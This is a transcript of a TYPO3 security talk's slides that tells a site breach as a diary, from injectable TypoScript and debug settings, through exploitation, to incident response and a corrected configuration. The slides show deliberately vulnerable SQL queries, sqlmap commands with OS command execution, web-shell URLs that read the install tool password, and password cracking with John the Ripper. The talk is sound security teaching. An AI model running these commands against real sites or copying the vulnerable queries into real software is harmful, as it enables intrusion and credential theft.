Diary of a Hack

Transcript

1. Inspiring people to share Diary of a Hack Vulnerabilities and

   Attacks Diary of a Hack Helmut Hummel <[email protected]> 22.04.2016 Vulnerabilities and Exploits 1

2. 2 @helhum

3. Security 3

4. 4 http://typotic.com/uploads/posts/3427/funny-dude-this-is-boring-01.jpg

5. 5 http://www.pxleyes.com/images/contests/teddy-bears-2/fullsize/Story-time-507bf54d589a1_hires.jpg

6. 6 http://www.value-scope.com/wp-content/uploads/bug_vs_feature.gif

7. 7 http://www.value-scope.com/wp-content/uploads/bug_vs_feature.gif

8. 8 http://i.telegraph.co.uk/multimedia/archive/02210/squirrel_2210134b.jpg

9. 9 https://xkcd.com/327/

10. 10 http://www.kitploit.com/2013/06/john-ripper-v180-fast-password-cracker.html

11. 11 https://ilifejourney.files.wordpress.com/2011/11/spaghetti-mess.jpg

12. 12 http://img3.wikia.nocookie.net/__cb20121122132016/villains/images/f/fb/Janitor_2.jpg

13. 13 http://i.livescience.com/images/i/000/029/390/i02/shutterstock_105432542.jpg?1343404330

14. 14

15. Diary of a Hack 15

16. Diary of a Hack Day 1 - Implementing a feature

    16

17. Diary of a Hack 17 lib.sqliSimple = CONTENT
 lib.sqliSimple {


    table = tt_content
 select.where.wrap = colPos=|
 select.where.data = GP:colPos
 }

18. Diary of a Hack 18 lib.sqliSearch = CONTENT
 lib.sqliSearch {


    table = tt_content
 select.where.wrap = header like '%|%'
 select.where.data = GP:search
 }

19. Diary of a Hack Day 2 - Testing the feature

    19

20. Diary of a Hack 20

21. Diary of a Hack 21 'BE/debug' => '1' 'FE/debug' =>

    '1' 'SYS/devIPmask' => '*' 'SYS/displayErrors' => '1' 'SYS/sqlDebug' => '1' 'SYS/exceptionalErrors' => '28674'

22. Diary of a Hack 22

23. Diary of a Hack 23 'DB/username' => 'root'

24. Diary of a Hack 24

25. Diary of a Hack Day 3 - Distraction 25

26. Diary of a Hack 26

27. Diary of a Hack Day 4 - Attraction 27

28. Diary of a Hack 28 https://www.google.de/?q=exec_SELECTquery+%22You +have+an+error+in+your+SQL+syntax%22

29. Diary of a Hack Day 5 - Exploitation 29

30. Inspiring people to share Diary of a Hack Vulnerabilities and

    Attacks Excursion - SQLi 30

31. Excursion - SQLi 31 SELECT * FROM tt_content WHERE colPos

    = 0

32. 32 'SELECT * FROM tt_content WHERE colPos = ' .

    $_GET['colPos'] Excursion - SQLi

33. 33 Excursion - SQLi

34. 34 'SELECT * FROM tt_content WHERE colPos = ' .

    $_GET['colPos'] Excursion - SQLi

35. 35 'SELECT * FROM tt_content WHERE colPos = 0 or

    hidden = 1' $_GET['colPos'] Excursion - SQLi

36. Disclaimer 36

37. Don’t do this at home! 37

38. (unless you have written permit) 38

39. Diary of a Hack 39 $ sqlmap -u 'http://security.dev/index.php?id=37&colPos=0' -p

    'colPos' ! GET parameter 'colPos' is vulnerable. Do you want to keep testing the others? [y/N] sqlmap identified the following injection points with a total of 30 HTTP(s) requests:

40. Inspiring people to share Diary of a Hack Vulnerabilities and

    Attacks The power of MySQL 40

41. Diary of a Hack 41 $ sqlmap -u 'http://security.dev/index.php?id=37&colPos=0' -p

    'colPos' \ —os-cmd='ls -al'

42. Diary of a Hack 42

43. Diary of a Hack 43 http://security.dev/tmpbrsru.php?cmd=touch%20typo3conf/ ENABLE_INSTALL_TOOL ! http://security.dev/typo3/sysext/install/Start/Install.php !

    http://security.dev/tmpbrsru.php?cmd=grep%20installToolPassword %20typo3conf/LocalConfiguration.php

44. Diary of a Hack 44 $ john pw Loaded 1

    password hash (phpass MD5 [128/128 SSE2 intrinsics 4x4x5]) password (dummy) guesses: 1 time: 0:00:00:01 DONE (Thu Jun 4 11:00:44 2015) c/s: 900 trying: 123456 - fishing

45. Diary of a Hack 45

46. Diary of a Hack Day 5 - Discovery 46

47. Diary of a Hack Discovery • Take site offline! •

    seriously • I mean it 47

48. 48

49. Diary of a Hack Day 6 - Analysis 49

50. Diary of a Hack Analysis • Make a backup of

    current state (files, DB, logs) • Search all logs for „suspicious“ entries • Find point of entry (security issue) • If in doubt: get help 50

51. Diary of a Hack Day 7 - Fix 51

52. Diary of a Hack 52 lib.sqliSimple = CONTENT
 lib.sqliSimple {


    table = tt_content
 select.where = colPos=###colPos###
 select.markers {
 colPos.data = GP:colPos
 }
 }

53. Diary of a Hack 53 lib.sqliSearch = CONTENT
 lib.sqliSearch {


    table = tt_content
 select.where = header like ###search###
 select.markers {
 search.data = GP:search
 search.wrap = %|%
 }
 }

54. Diary of a Hack Fix • Close security issue in

    Code/ Extension/ Core • Restore from backup • Or if you really know what you are doing: cleanup installation • Go online again • Plan improvements (education, monitoring, …) 54

55. Diary of a Hack Day 8 - Improve 55

56. Inspiring people to share Security of Web Applications Vulnerabilities and

    Attacks Topictext Lessons learned • Development/ Testing Environment • Deploy to Production • Least privilege • There is no Software without bugs. Be prepared! 56

57. Diary of a Hack Best Practice • Operations • Regular

    updates • Backups • Monitoring • Development • Peer Reviews (TypoScript, Code, Templates) • (automated) Tests • Focus • Education • Allocate time for all of the above 57

58. Questions? 58

59. Inspiring people to share Security of Web Applications Vulnerabilities and

    Attacks Diary of a Hack Resources • http://docs.typo3.org/typo3cms/SecurityGuide/ • http://sqlmap.org • http://www.openwall.com/john/ • https://www.owasp.org/ 59

60. Thank you! 60

61. 61 @helhum http://helhum.io [email protected]